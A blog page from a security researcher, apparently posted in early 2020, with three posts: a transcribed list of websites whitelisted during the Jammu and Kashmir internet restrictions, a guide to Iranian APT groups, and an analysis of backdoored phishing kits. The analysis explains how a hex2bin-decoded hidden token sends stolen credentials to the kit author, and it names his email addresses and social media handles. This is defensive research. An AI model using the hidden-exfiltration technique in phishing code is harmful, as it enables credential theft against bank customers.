Tuesday, January 28, 2020

How does a government censor the Internet? A rare peek from Jammu and Kashmir

From time to time we hear that a totalitarian government has locked down Internet access for a part or all of their country.  Normally, that is about all we hear about the situation.  In the case of India, not normally thought of as a Totalitarian government, we have a unique opportunity to look at what they are censoring as they began to relax the total lockout of Internet services that was put into place in Jammu and Kashmir.

The "lift" of total censorship began on January 14th, when Internet Service Providers were ordered to install firewalls that would only allow access to 153 government-approved websites.  As was pointed out by "The Wire", "No Mainstream News in List of 153 Whitelisted Websites Under Kashmir's First Govt Firewall."  TheWire.in noted that "Conspicuously absent from the list that includes Gmail, Netflix, Zomato, Oyo Rooms and Paytm are news and social media websites."

The order from the "Principal Secretary to the Government, Home Department" to the ISPs stated that the Internet shutdown was because "there have been number of reports of the use of internet in cross border terrorism/terror activities, incitement, rumour-mongering, etc. as also misuse of pre-paid mobile connections by anti-national elements."

Internet Order

The total ban of Internet services remained in effect for "the districts of Srinagar, Budgam, Ganderbal, Baramulla, Anantnag, Kulgan, Shopian, and Pulwama.  But for "all the 10 districts of Jammu division and to begin with the revenue districts of Kupwara & Bandipora of the Kashmir Valley" were allowed to have access to the list of 158 websites beginning on January 18th, 2020.  (That list is available via Scribd here:  "Temporary Suspension of Telecom Services"

A week later, the list was amended to include not only many News sites, as TheWire had pointed out, but also a large list of "Utilities" which included movie theaters, car dealerships, shoe sales websites, and pizza delivery services.

The new expanded list is provided below in a searchable form (the original is an image-based scan.)

I would invite others to make relevant observations in the comments sections, or in your own publications linking back to this page.  The list is intended to be a faithful representation of the new order, which can be found on the JK Home Office website as Home-05(TSTS) of 2020.

While the order has been commonly described as containing "300 URLs", there are a handful of duplicates, where a URL was included both with a trailing slash and without the slash.  It should also be noted that there are a very large number of websites included by Top Level Domain, due to the inclusion of the TLDs:  Ac.in (most academic institutions in India will be included here), Gov.in (most government offices and services in India will be included here), and Nic.in (most network infrastructure services from the Ministry of Electronics and Information Technology is included here.)

It is curious how it was decided which websites to include and not to include.  For example, why include Adidas and Reebok, but not Nike?  I'm sure the programmers are thrilled to see that Github and StackOverflow are included!  What other observations strike you as interesting?  Please comment or Tweet about them!


Site NumberWebsite URL Category
1www.google.comSearch Engines
2www.apple.comSearch Engines
3www.office.comSearch Engines
4www.google.com > chromeSearch Engines
5www.google.caSearch Engines
6ca.search.yahoo.comSearch Engines
7search.yahoo.comSearch Engines
8www.live.comSearch Engines
9www.ask.comSearch Engines
10search.msn.comSearch Engines
11www.google.co.ukSearch Engines
12qc.search.yahoo.comSearch Engines
13www.hyundai.comAutomobiles
14www.suzukimotorcycle.co.inAutomobiles
15www.tata.comAutomobiles
16www.marutisuzuki.com/MarutiSuzuki/CarAutomobiles
17www.axisbank.comBanking
18www.hdfc.comBanking
19www.hdfcsec.comBanking
20www.icicibank.comBanking
21www.icicidirect.comBanking
22www.jkbankonline.comBanking
23www.onlinesbi.comBanking
24www.pnbindia.inBanking
25www.bankbazaar.comBanking
26www.moneycontrol.comBanking
27www.paisabazaar.comBanking
28www.paypal.comBanking
29www.policybazaar.comBanking
30www.rbi.org.inBanking
31www.westernunion.comBanking
32jammuuniversity.inEducation
33jkpsc.nic.inEducation
34jkssb.nic.inEducation
35kashmiruniversity.netEducation
36skuastkashmir.ac.inEducation
37www.cukashmir.ac.inEducation
38www.freejobalert.comEducation
39mahendras.orgEducation
40mrunal.orgEducation
41www.bankersadda.comEducation
42www.indianetzone.comEducation
43www.insightsonindia.comEducation
44www.iustlive.comEducation
45www.tcyonline.comEducation
46www.vedantu.comEducation
47www.aakash.ac.inEducation
48www.britannica.comEducation
49www.burnhallschool.ac.inEducation
50www.byjus.comEducation
51www.damsdelhi.comEducation
52www.dpssrinagar.comEducation
53www.elsevier.comEducation
54www.foundationworldschool.comEducation
55www.gdgoenkasrinagar.comEducation
56www.github.comEducation
57www.gktoday.inEducation
58www.ignou.ac.inEducation
59www.indiankanoon.orgEducation
60www.indiaresults.comEducation
61www.islamicuniversity.edu.inEducation
62www.lpu.inEducation
63www.madeeasy.inEducation
64www.mciindia.orgEducation
65www.nature.comEducation
66www.nitsri.ac.inEducation
67www.pathfinderacademy.inEducation
68www.pchssrinagar.comEducation
69www.resonance.ac.inEducation
70www.sciencedirect.comEducation
71www.siu.edu.inEducation
72www.springer.comEducation
73www.ssmengg.edu.inEducation
74www.stackoverflow.comEducation
75www.udemy.comEducation
76www.unacademy.comEducation
77www.wikipedia.orgEducation
78www.naukri.comEmployment
79www.jagranjosh.comEmployment
80www.sail.co.inEmployment
81Airtel TVEntertainment
82Amazon PrimeEntertainment
83HotstarEntertainment
84gaana.comEntertainment
85tatasky.comEntertainment
86tvfplay.comEntertainment
87www.altbalaji.comEntertainment
88www.dishtv.inEntertainment
89www.imdb.comEntertainment
90www.jiosaavn.comEntertainment
91www.spotify.comEntertainment
92wynk.inEntertainment
93NetflixEntertainment
94Sony LivEntertainment
95VootEntertainment
96www.crickbuzz.comEntertainment
97www.espn.inEntertainment
98Zee5Entertainment
99www.google.com > gmailMail
100in.mail.yahoo.comMail
101mail.rediff.comMail
102outlook.live.comMail
103news.statetimes.inMail
104prsindia.orgMail
105www.earlytimes.inEntertainment
106www.kashmirtimes.comNews
107www.kashmiruzma.netNews
108www.risingkashmir.comNews
109www.thenorthlines.comNews
110aajtak.intoday.inNews
111economictimes.indiatimes.comNews
112edition.cnn.comNews
113kashmirage.netNews
114kashmirobserver.netNews
115news.google.comNews
116scroll.inNews
117thekashmirimages.comNews
118theprint.inNews
119theprint.inNewsDUPLICATE
120thewire.inNews
121timesofindia.indiatimes.comNews
122www.aljazeera.comNews
123www.amarujala.comNews
124www.bbc.comNews
125www.business-standard.comNews
126www.channelnewsasia.comNews
127www.dailyexcelsior.comNews
128www.dailypioneer.comNews
129www.deccanchronicle.comNews
130www.epw.inNews
131www.financialexpress.comNews
132www.financialexpress.com NewsDUPLICATE
133www.forbes.comNews
134www.greaterkashmir.comNews
135www.hindustantimes.comNews
136www.jagran.comNews
137www.livemint.comNews
138www.mid-day.comNews
139www.moneycontrol.comNews
140www.moneycontrol.comNewsDUPLICATE
141www.ndtv.comNews
142www.newindianexpress.comNews
143www.news18.comNews
144www.nytimes.comNews
145www.outlookindia.comNews
146www.outlookindia.comNewsDUPLICATE
147www.presstv.comNews
148www.presstv.comNewsDUPLICATE
149www.republicworld.comNews
150www.scoopwhoop.comNews
151www.telegraphindia.comNews
152www.theguardian.comNews
153www.thehindu.comNews
154www.thehindubusinessline.comNews
155www.thekashmirmonitor.netNews
156www.thelallantop.comNews
157www.thequint.comNews
158www.timesnownews.comNews
159www.tribuneindia.comNews
160www.washingtonpost.comNews
161www.wionews.comNews
162www.wsj.comNews
163www.amnesty.orgNGOs
164www.fordfoundation.orgNGOs
165www.helpageindia.orgNGOs
166www.savethechildren.inNGOs
167www.smilefoundationindia.orgNGOs
168Ac.inServices
169Gov.inServices
170www.incometaxindiaefiling.gov.inServices
171www.jkpolice.gov.inServices
172www.passportindia.gov.inServices
173www.services.gst.gov.inServices
174enps.nsdl.comServices
175uidai.gov.inServices
176nic.inServices
177www.gmcs.edu.inServices
178www.lalpathlabs.comServices
179www.shifamedcenter.comServices
180www.skims.ac.inServices
181geekyranjit.comTechnology Updates
182overdrive.inTechnology Updates
183beebom.comTechnology Updates
184www.androidauthority.comTechnology Updates
185www.autocarindia.comTechnology Updates
186www.carwale.comTechnology Updates
187www.cnet.comTechnology Updates
188www.digit.inTechnology Updates
189www.engadget.comTechnology Updates
190www.gsmarena.comTechnology Updates
191www.pcmag.comTechnology Updates
192www.techradar.comTechnology Updates
193www.theverge.comTechnology Updates
194www.zigwheels.comTechnology Updates
195www.cleartrip.comTravel
196www.goibibo.comTravel
197www.irctc.co.inTravel
198www.makemytrip.comTravel
199www.yatra.comTravel
200www.airindia.comTravel
201www.cleartrip.comTravel
202www.easemytrip.comTravel
203www.flightstats.comTravel
204www.hajcommitee.gov.inTravelTYPO
205www.iismgulmarg.inTravel
206www.incredibleindia.orgTravel
207www.ixigo.comTravel
208www.jktourism.orgTravel
209www.oyorooms.comTravel
210www.pawanhans.co.inTravel
211www.redbus.inTravel
212www.shriamarnathjishrine.comTravel
213www.trivago.comTravel
214www.trivago.in Travel
215jakemp.nic.inUtilities
216www.jabong.comUtilities
217billsahuliyat.jkpdd.netUtilities
218earth.google.comUtilities
219www.airtel.inUtilities
220www.amazon.inUtilities
221www.bhimupi.org.inUtilities
222www.flipkart.comUtilities
223www.healthkart.comUtilities
224www.myntra.comUtilities
225www.netmeds.comUtilities
226www.paytmbank.comUtilities
227JIO chatUtilities
228www.99acres.comUtilities
229www.airtel.inUtilitiesDUPLICATE
230www.bharatpetroleum.comUtilities
231www.bluedart.comUtilities
232www.bsnl.co.inUtilities
233www.cardekho.comUtilities
234www.dtdc.inUtilities
235www.ebharatgas.comUtilities
236www.fedex.comUtilities
237www.firstflight.netUtilities
238www.freecharge.inUtilities
239www.gaadiwaadi.comUtilities
240www.gati.comUtilities
241www.indane.co.inUtilities
242www.indiamart.comUtilities
243www.jio.com Utilities
244www.jkhandicrafts.comUtilities
245www.jkpdd.gov.inUtilities
246www.jkpwdrb.nic.inUtilities
247www.justdial.comUtilities
248www.magicbricks.comUtilities
249www.myhpgas.inUtilities
250www.olx.inUtilities
251www.pharmeasy.inUtilities
252www.quikr.comUtilities
253www.sulekha.comUtilities
254www.tbmes.orgUtilities
255www.vodafone.inUtilities
256www.zomato.comUtilities
257cleartax.inUtilities
258in.bookmyshow.comUtilities
259keep.google.comUtilities
260lens.google.comUtilities
261oppo-inUtilities
262support.google.comUtilities
263support.microsoft.comUtilities
264translate.google.co.inUtilities
265vimeo.comUtilities
266wikimapia.orgUtilities
267www.adidas.co.inUtilities
268www.ajio.comUtilities
269www.aliexpress.comUtilities
270www.bajaauto.comUtilities
271www.bing.comUtilities
272www.decathlon.inUtilities
273www.dell.comUtilities
274www.dominos.co.inUtilities
275www.fabindia.comUtilities
276www.gingerlabs.comUtilities
277www.heromotocorpo.com/en-in/Utilities
278www.houzz.inUtilities
279www.indeed.co.inUtilities
280www.india.ford.comUtilities
281www.indiamart.comUtilities
282www.jeep-india.comUtilities
283www.kia.comUtilities
284www.kinemaster.comUtilities
285www.lenovo.comUtilities
286www.lenskart.comUtilities
287www.office.comUtilitiesDUPLICATE
288www.pizzahut.co.inUtilities
289www.pvrcinemas.comUtilities
290www.quora.comUtilities
291www.reebok.comUtilities
292www.shopclues.comUtilities
293www.swiggy.comUtilities
294www.tatamotors.comUtilities
295www.toyotabharat.comUtilities
296www.upwork.comUtilities
297www.wavecinemas.comUtilities
298www.upwork.comUtilitiesDUPLICATE
299www.zomato.comUtilities
300www8.hp.comUtilities
301www.accuweather.comUtilities

Thursday, January 09, 2020

Iranian APT Group Overview

Today the Birmingham InfraGard Chapter and the Alabama ISSA held a joint meeting featuring a presentation from the Cybersecurity & Infrastructure Security Agency, part of DHS that was formerly known as the NPPD.  I learned of a ton of offerings from CISA.gov at the meeting, so I want to start by sharing a link to their CISA Insights Page, where they released earlier this week some guidelines for updating your company's Risk Assessment regarding potential cyber or physical threats from Iranian actors in light of our current political situation, and the tendency of the Iranian regime to lash out with Cyber attacks when they can't accomplish what they want with the limited reach of their military.  That Insight was called Increased Geopolitical Tensions and Threats and features ten readiness steps for making sure your org is not a soft target for cyber attacks from Iran. Most of these are things you should be doing anyway, but hey, an Iran threat is possibly a good time to go check those out!  One way of thinking about covering your cyber bases that I really like is actually from the Australian Government, who recommends their "Essential 8" Strategies to Mitigate Cyber Security Incidents.  Start with making sure you have your Essentials covered, but then move on to "Very Good" and "Excellent" steps as your org matures your security practices.

However, we all know that Iran has many Advanced Persistent Threat (APT) Groups, and that there is much more to watching for such activity then patching your systems and telling your users to be aware.  A large org will want to know more about the behaviors of documented Iranian APT Groups. Often these insights include known malware families used by the actor, or what sectors or countries this threat group historically has attacked.

I've seen several documents that share a woefully incomplete list of APT groups from Iran, so I've tried to pull together some helpful links to the main groups below.  In each case, if their is a "MITRE Group #" after the main title, you will find a very robust list of TTPs (Tactics, Techniques, and Procedures) about the group and links to many more reports and resources about the group than I have provided below.  However, I DO like the reports I've listed and think you might want to read them as part of "basic understanding" before following a dozen reports about the same group.  One slight complaint about the MITRE data, and APT Group Naming in general, is there is a great deal of disagreement about which group names are aliases for the same groups, and which may be entirely different groups that just share some tools with one another.  Hey, I'm doing the best I can here, and so is MITRE.  It's tricky!  If you feel I've really got something screwed up, leave a comment!  Let's chat!

Most every vendor it seems likes to put their own personal spin on APT Groups.  I have to confess to being a sucker for the CrowdStrike naming conventions (Hi Adam! Hi Dmitri! Hi Shawn!).  They use a different Animal to label each APT Group based on the name of the country where the group is hosted.  Their name for Iran is "Kitten" (as in "Persian Kitten", get it?)

While there are several excellent APT Disambiguation efforts, my favorite for ease of use is the one run by Florian Roth (Twitter @Cyb3rops ) - APT Groups and Operations.  Go to the Iran tab. There are columns for malware sets and links related to each group as well.

If you prefer a much more detailed read of APT Groups, the ThaiCERT has an amazing Threat Actor Encyclopedia! A 275 page omnibus of APT!  However, it is really tricky to pull out, for example, JUST the Iran stuff from it.

For now, I'll organize this by the CrowdStrike Kitten Names. Their set includes at least:

but there are many other companies naming other Iranian APT Groups that may or may not link up with the Kittens.  FireEye is the main user of the numbered APT Groups.  Many of these now have a "Kitten" name as you see above ... APT33, 34, 35, and 39 are all Iranian.  There are several "less well labeled" actors who either don't really behave like traditional APT, or haven't been as widely linked as those above, but are still serious.  A few of those below:
  • Cyber Fighters of Izz Ad-Din Al Qassam - the bank DDOS guys.  
  • DarkHydrus (AKA Lazy Meerkat) - some say is actually also Slayer Kitten, others disagree
  • Gold Iowell (AKA Boss Spider) - these are the SamSam Ransomware guys 

If it would be helpful to just have the MITRE links all in one place, here you go!

Thursday, January 02, 2020

Backdoored Phishing Kits are still popular

What did you do for the holidays?  If you're a cybercrime geek you probably took advantage of some of the extra time on your hands to investigate some new phishing sites, right?



Jone Fredrick is the type of Facebook user who is quite open about his criminal activity.  He boasts about his phishing skills by having a Facebook profile picture of someone taking a selfie showing their government issued ID and their credit card!  He claims to live in Blida, Algeria, and probably does.  Over the holidays Jone update his YouTube channel, "mr azert" with a new Chase Bank phishing kit.  (Phishers don't call this phishing.  They call it "bank scams" or "scam pages."

In the past two weeks, Jone, who uses the alias "Mr Azert", has uploaded several videos about his new scam pages to his YouTube channel.  Chase, Spotify, Dropbox, Alibaba, and Paypal all have new scam pages courtesy of Mr Azert.  How generous that he just gives them away for free!


After listening to so much bad gangster/scammer rap music, it was nice to hear some Algerian rap while I did my investigation.  Mr Azert confirms this is him by replying to "Tutor Arena421" giving him his email address (foley.victoria998@gmail.com) and Facebook address ( jone.fredrick.79).


Of course, we report the offending content to YouTube.  If you ever encounter the same, please use the "Report" function.  The correct flow is to click the "Three Dots" ... then "Report".  Then choose  "Spam or misleading" and then the subcategory "Scams / fraud"



In this case, the reason Mr Azert is giving away these phishing kits is that he has backdoored all of the kits.  We'll look at the Chase one first.   There are five separate PHP files that send the various stolen information back to the person using the kit.  



When we look at the actual "Send" command, we notice that the email command says "for each $send" ... but the instructions for the kit have told the kit downloader that they should include their own email address in a certain place, which is "import"ed into this code.  What other address is being used here?


If we scroll up about we see that $send is receiving a variable called "token" from the form post that called this PHP code, and then converting it into ASCII with "hex2bin".


The calling code in this case is "myaccount.php" which seems to do some "input validation" but in reality, is also loading the "token" value:


That hex string at the bottom starting with "6665" is decoded in the "hex2bin" call into a pair of email addresses:  

  fenction@gmail.com  and fenction@yahoo.com

So, anyone who downloads Mr Azert's kit is going to either create or hack a website, upload and unpack the kit, spam out links to that URL, and then have all of their stolen data go back to Mr Azert in Algeria, who is likely to be better at cashing out the information than someone too lame to make their own phishing kit.

We're of course reporting all of this to YouTube, Gmail, Yahoo, and Facebook ... 

So how did you spend YOUR holiday?  

Happy New Year everyone!